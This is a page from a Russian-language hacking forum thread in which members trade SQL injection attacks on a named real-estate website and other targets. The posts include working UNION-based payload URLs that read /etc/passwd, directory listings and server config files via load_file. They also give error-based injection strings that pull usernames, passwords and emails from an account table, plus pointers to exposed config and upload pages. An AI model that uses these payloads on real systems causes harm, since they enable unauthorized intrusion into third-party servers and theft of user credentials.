HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #181  
Старый 08.06.2015, 17:58
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от huntercs16  
huntercs16 said:

Код:
Code:
http://5788sagebrookdrive.com/property-details?mls=-1'+/*!uNIoN*/+(/*!SelEcT*/+1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,concat(0x3a3a3a3a3a,database(),0x3a3a3a3a3a),1+)+--+;&src=1
Как узнать где сайт лежит?
http://5788sagebrookdrive.com/phpinfo.php
 
Ответить с цитированием

  #182  
Старый 08.06.2015, 18:14
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию

Цитата:
Сообщение от winstrool  
+ еще раскрытия

http://5788sagebrookdrive.com/inc/config.php

http://5788sagebrookdrive.com/file_upload.php
 
Ответить с цитированием

  #183  
Старый 08.06.2015, 18:34
huntercs16
Guest
Сообщений: n/a
Провел на форуме:
35200

Репутация: 6
По умолчанию

Цитата:
Сообщение от winstrool  
Все хорошо, но

Код:
Code:
_SERVER["SCRIPT_FILENAME"]    /home/lwdhost/www/live.realcove.com/index.php
http://5788sagebrookdrive.com/phpinfo.php
Br@!ns

Аналогично, /etc/passwd,говорит как раз что www-юзер имеет /home/lwdhost.

----------

спасибо на этом хотя бы

 
Ответить с цитированием

  #184  
Старый 08.06.2015, 18:42
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от huntercs16  
huntercs16 said:

Все хорошо, но
Код:
Code:
_SERVER["SCRIPT_FILENAME"]    /home/lwdhost/www/live.realcove.com/index.php
http://5788sagebrookdrive.com/phpinfo.php
Br@!ns
Аналогично, /etc/passwd,говорит как раз что www-юзер имеет /home/lwdhost.

радость-то какая, наконец-то могу пощупать эту фишку freebsd:

Код:
Code:
http://5788sagebrookdrive.com/property-details?mls=-1%27+/*!uNIoN*/+%28/*!SelEcT*/+123,123,load_file%28%27/etc/%27%29,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,123,1+%29+--+;&src=1
т. е. при чтении директории получаете список файлов и папок

директория /home/lwdhost/

Код:
Code:
http://5788sagebrookdrive.com/property-details?mls=-1%27+/*!uNIoN*/+%28/*!SelEcT*/+123,123,load_file%28%27/home/lwdhost/%27%29,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,123,1+%29+--+;&src=1
почему такая ерунда с папками? в httpd прописаны алиасы:

Код:
Code:
http://5788sagebrookdrive.com/property-details?mls=-1%27+/*!uNIoN*/+%28/*!SelEcT*/+1,1,1,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,load_file%28%27/home/MPS.httpd.conf.bk25oct2010%27%29,1+%29+--+;&src=1
Код:
Code:
addisonklein
advancedlabs
brian
brian1
cameron
canon-copier
coldwellca
cortexx
dns
formbuilder
grijalva
impact
jennie
jira
lwdhost
mayer
mlsimages
olyins
outgoing
pcmls
puddlejumpers
riverbendranch
ryanm
steve1
tara
theofficialjeff
tyler
unixsa
vera
koliopoulos
gsmls
MPS.httpd.conf.bk25oct2010
MPS.php.ini.bk25oct2010
VPS.httpd.conf.bk25oct2010
VPS.php.ini.bk25oct2010
нужно перебрать все папки и найти доступную на чтение и запись, заодно найти httpd.conf и найти для каждого document_root
 
Ответить с цитированием

  #185  
Старый 09.06.2015, 00:00
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию

в magento конфиге (local.xml) есть вот такая запись, ниже данных Mysql:

.SpoilerTarget" type="button">Spoiler: code

*password*

Что она означает? и как можно подключиться по этим данным?
 
Ответить с цитированием

  #186  
Старый 09.06.2015, 00:22
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

Цитата:
Сообщение от Br@!ns  
Br@!ns said:

в magento конфиге (local.xml) есть вот такая запись, ниже данных Mysql:
Spoiler: code

*password*

Что она означает? и как можно подключиться по этим данным?
Похоже на Redis Cache, в нете туториалы есть )
 
Ответить с цитированием

  #187  
Старый 11.06.2015, 12:37
Unknown
Guest
Сообщений: n/a
Провел на форуме:
2015

Репутация: 5
По умолчанию

Помогите составить запрос в бд плиз) ситуация следующая, есть скуля необходимо узнать название колонки в которой имеется значение 3.00 для юзера с id=6010.
 
Ответить с цитированием

  #188  
Старый 11.06.2015, 13:51
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от rumbln  
rumbln said:

Помогите составить запрос в бд плиз) ситуация следующая, есть скуля необходимо узнать название колонки в которой имеется значение 3.00 для юзера с id=6010.
SELECT * FROM таблица_с_юзерами WHERE id = 6010.

в ответе получите все данные по пользователю и узнаете имя колонки
 
Ответить с цитированием

  #189  
Старый 11.06.2015, 16:40
AndreyBerkut
Guest
Сообщений: n/a
Провел на форуме:
1354

Репутация: 0
По умолчанию

Хелп плз

при попытке выполнить 25'or(ExtractValue(1,concat(0x5C,(select(SUBSTRING (group_concat(count(*)),1))from(realmd.account)))) )and(1)='1появляется ошибка Query failed : FUNCTION realmd.ExtractValue does not exist

Как я понял, в этой версии mysql еще нет функции ExtractValue.Какие есть альтернативы?

P.S.

25'OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((select concat_ws(0x3a,username,password,email) from account limit 0,1), 1, 63), FLOOR(RAND(0)*2)))and(1)='1 проходит, выводит: 5.0.67-log
 
Ответить с цитированием

  #190  
Старый 11.06.2015, 16:51
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию

Цитата:
Сообщение от AndreyBerkut  
AndreyBerkut said:

Хелп плз
при попытке выполнить
25'or(ExtractValue(1,concat(0x5C,(select(SUBSTRING (group_concat(count(*)),1))from(realmd.account)))) )and(1)='1
появляется ошибка
Query failed : FUNCTION realmd.ExtractValue does not exist
Как я понял, в этой версии mysql еще нет функции
ExtractValue.
Какие есть альтернативы?
P.S.

25'OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(version(), 1, 63), FLOOR(RAND(0)*2)))and(1)='1 проходит, выводит: 5.0.67-log

По по воду версий https://dev.mysql.com/doc/refman/5.1...functions.html.

Если остальные техники вывода не отрабатывают, используйте вывод через ошибку группировки.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ